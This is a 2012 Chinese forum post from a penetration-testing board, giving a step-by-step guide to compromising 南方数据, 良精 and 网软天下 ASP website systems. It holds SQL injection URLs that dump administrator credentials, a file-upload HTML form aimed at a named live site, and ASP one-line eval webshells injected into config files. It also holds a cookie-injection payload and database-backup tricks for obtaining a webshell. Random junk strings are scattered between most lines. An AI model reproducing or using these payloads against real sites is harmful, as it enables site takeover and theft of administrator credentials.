中国网络渗透测试联盟
标题:
南方数据网站管理系统注入漏洞&后台拿WebShell
[打印本页]
作者:
admin
时间:
2012-12-4 11:06
标题:
南方数据网站管理系统注入漏洞&后台拿WebShell
/Databases/0791idc.mdb
) x7 ~5 Q3 e+ }, Y$ z2 U
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
! i. D' @) f2 a! @1 p& T
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
1 ~$ H4 m% T4 F5 p
直接暴管理员帐号密码(md5)
6 h9 j* C' N4 P. M; ^( ~7 w. X d
2.登陆后台
3 U. X' d% ?$ A0 R q" ?0 l: v
3.利用编辑器上传:
4 b2 x4 f: o' M) o, `
访问admin/southidceditor/admin_style.asp
% A# l: K1 l! y8 |
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
8 L6 }0 t: f& Y; q$ q
3 {& {" p! b5 i7 W
========================================
: ~4 g* H: f" C( }" R# K) O9 l3 O5 \! u
& z$ l% C- _5 ~. w. V4 f7 ^
参考资料整理:
: A. \! z; x& g* `" D5 f
南方数据、良精系统、网软天下漏洞利用
+ Y: m6 ], W# G1 J6 |: J
$ _- v" S0 [4 P7 L. i3 A6 i7 B3 Z
1、通过upfile_other.asp漏洞文件直接取SHELL
& ^- Z8 _0 A$ f1 Y4 b
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
7 |3 L4 w: m' {* \# A
<HTML><HEAD>
; A2 A1 s+ s" K
<META http-equiv=Content-Type content="text/html; charset=gb2312">
2 N- k- Y! V5 D4 C4 F
<STYLE type=text/css>BODY {
. p( R3 V! R6 K" e: T( w
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
+ m) r0 s* o' C/ o* y
}
/ V$ f8 R3 {4 Q
.tx1 {
* U. p) _) W/ X1 @* ]! E
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
. u8 f+ [. x& a) w
}
' z6 M; {. ^! k
</STYLE>
, j0 A& [" k9 G, J! M& e
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
" p f/ \) N1 J5 y7 `- l
<BODY leftMargin=0 topMargin=0>
7 X: [5 U8 x9 a: D
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
' P2 {% D4 T+ n1 n( m
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
Q0 v0 r' X+ h$ X' {0 `7 v$ R* r
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
0 D6 f. I4 k0 Z9 ?: |; L6 b& ~
. A, ~$ U& d7 p3 c0 l1 Q" v4 X v
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
: B k* d* p# { J
注:此方法通杀南方数据、良精系统、网软天下等
8 n: I( `0 W. e; l% i
! n) K' O$ s3 L& w$ ?3 o
2、通过注入秒杀管理员帐号密码,使用如下:
% ^! V: q2 u. x* q% z. \. g$ n d
http://www.huobaodidai.cn/NewsType.asp?SmallClass=
’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
) y4 O! x( m8 Q8 n+ T% u
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
/ n: a% N; t# Q; o
在网站配置[
http://www.target.com/admin/SiteConfig.asp
]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
4 e! {' N, l& X% h v3 I
成功把shell写入
http://www.target.com/inc/config.asp
. ^6 a4 s( o! F/ e! ~' [
这里一句话chr(32)密码是“#”
8 [8 b7 ?, b! \- Z* H; `( P! Z
3、cookie注入
7 a4 `" ~! m7 t7 e
清空地址栏,利用union语句来注入,提交:
, K7 L j: K, `) j
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
. J1 G4 u8 Z* l' n3 Y; v# U8 w8 V
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
# L' c$ i5 @5 m3 v
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
! d z; W% `* F, I. Z1 F+ d) d7 m
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
: J8 x1 n" g) H$ z1 t* o. R5 M- q# x% [
9 r6 V" B) e2 |; l
三、后台取SHELL方法总结
% n! \$ k$ |* D, k
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
, a& O) H8 I% k, ^3 z, z( f
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
$ ^4 d; N- l7 R; U8 G2 ]
这时再打开一句话马的客户端,提交同样得到一个小马
) z7 n/ x8 W# i1 a4 g
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
1 I; x% D. N& p
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
( U$ [7 C6 a+ M& }5 K) Z# X
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
( W# d& e$ H s% `8 W
EnableUpload=false
# o4 X8 v" K; I/ ~# {. i
) \9 ]; P; X9 K( F7 r3 t& @
end if
- F; ]; b& z& \" ]
if EnableUpload=false then
3 ?2 v' G0 K, x) q* {
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
$ m2 M! O7 h5 Y" B7 l" g
FoundErr=true
& V: x( W! B) Y& R* i
end if
2 p6 e6 j9 R# o- ?7 E+ T9 Y
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
+ c. W: r+ I' [# C. X
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
; p* Z: w7 W& |) X! E2 R
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
( J$ e. q. U# f, k& j K3 s
' U2 F- U5 C3 P; p* B( C
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
& n/ ?4 ~( J; K, w
直接访问备份后的地址,就得到一个webshell
5 Y" K6 l. X, N
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2